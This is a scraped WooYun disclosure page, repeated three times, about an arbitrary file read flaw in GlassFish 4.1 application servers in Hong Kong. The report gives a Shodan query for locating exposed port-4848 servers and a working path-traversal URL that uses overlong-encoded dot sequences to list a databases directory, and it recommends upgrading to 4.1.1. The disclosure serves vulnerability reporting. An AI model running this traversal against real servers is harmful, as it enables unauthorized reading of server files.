ICARE香港GLASSFISH服务器存在通用任意文件读取漏洞（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170653

漏洞标题：ICARE香港GLASSFISH服务器存在通用任意文件读取漏洞（香港地區）

漏洞作者： z3r0

提交时间：2016-01-25 11:19

修复时间：2016-01-28 15:24

公开时间：2016-01-28 15:24

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-25：细节已通知厂商并且等待厂商处理中
2016-01-28：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

ICARE香港GLASSFISH应用服务器版本存在通用任意文件读取漏洞

详细说明：

1. 通过shodan查找存在漏洞的应用服务器
http://**.**.**.**https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201601/20173918c7c68e074b1626afbd3e9806b33c9e7b.png

https://**.**.**.**/search?query=glassfish++port%3A4848+country%3Ahk+4.1

2. 尝试服务器遍历目录
**.**.**.**:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/databases/

漏洞证明：

如上

修复方案：

升级GLASSFISH版本到4.1.1

版权声明：转载请注明来源 z3r0@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-01-28 15:24

厂商回复：

沒有對應的相關機構/擁有人

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170653

漏洞标题：ICARE香港GLASSFISH服务器存在通用任意文件读取漏洞（香港地區）

相关厂商：ICARE

漏洞作者： z3r0

提交时间：2016-01-25 11:19

修复时间：2016-01-28 15:24

公开时间：2016-01-28 15:24

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 z3r0@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0170653

漏洞标题：ICARE香港GLASSFISH服务器存在通用任意文件读取漏洞（香港地區）

相关厂商：ICARE

漏洞作者： z3r0

提交时间：2016-01-25 11:19

修复时间：2016-01-28 15:24

公开时间：2016-01-28 15:24

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0170653"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 z3r0@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：